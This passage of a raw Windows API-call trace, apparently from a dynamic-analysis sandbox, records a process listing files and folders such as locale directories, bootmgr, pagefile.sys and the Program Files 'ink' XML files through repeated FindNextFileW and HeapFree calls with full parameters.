ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0157.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.424] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0157.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.424] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0157.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.425] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0157.425] FindClose (in: hFindFile=0x727e08 | out: hFindFile=0x727e08) returned 1 [0157.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0157.427] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0157.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0157.428] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0157.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0157.429] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x762f67e4, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0157.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0157.435] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x779cb26e, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0157.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0157.436] FindNextFileW (in: hFindFile=0x6ba170, lpFindFileData=0x3b3fcf8 | out: lpFindFileData=0x3b3fcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x330ca4b, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x330ca4b, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0157.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0157.438] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0157.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0157.443] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ink", cAlternateFileName="")) returned 1 [0157.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.558] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0157.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.559] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0157.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.559] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0157.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.559] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0157.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.559] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0157.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.560] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0157.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.560] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.561] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0157.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.561] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0157.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.561] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0157.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.561] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0157.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.561] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd11f8841, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd11f8841, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0157.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.562] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0157.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.562] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0157.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4589fb0 | out: hHeap=0x6a0000) returned 1 [0157.562] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0157.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4589fb0 | out: hHeap=0x6a0000) returned 1 [0157.563] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="insert.xml", cAlternateFileName="")) returned 1 [0157.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4589fb0 | out: hHeap=0x6a0000) returned 1 [0157.563] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0157.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4589fb0 | out: hHeap=0x6a0000) returned 1 [0157.567] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="main.xml", cAlternateFileName="")) returned 1 [0157.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4589fb0 | out: hHeap=0x6a0000) returned 1 [0157.567] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskclearui.xml", cAlternateFileName="")) returned 1 [0157.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4589fb0 | out: hHeap=0x6a0000) returned 1 [0157.570] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0157.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4589fb0 | out: hHeap=0x6a0000) returned 1 [0157.570] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknav.xml", cAlternateFileName="")) returned 1 [0157.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4589fb0 | out: hHeap=0x6a0000) returned 1 [0157.570] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0157.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4589fb0 | out: hHeap=0x6a0000) returned 1 [0157.570] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0157.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4589fb0 | out: hHeap=0x6a0000) returned 1 [0157.572] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0157.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.572] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0157.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.572] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0157.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.573] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0157.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579fa8 | out: hHeap=0x6a0000) returned 1 [0157.573] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe382bd1f, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe382bd1f, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0157.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 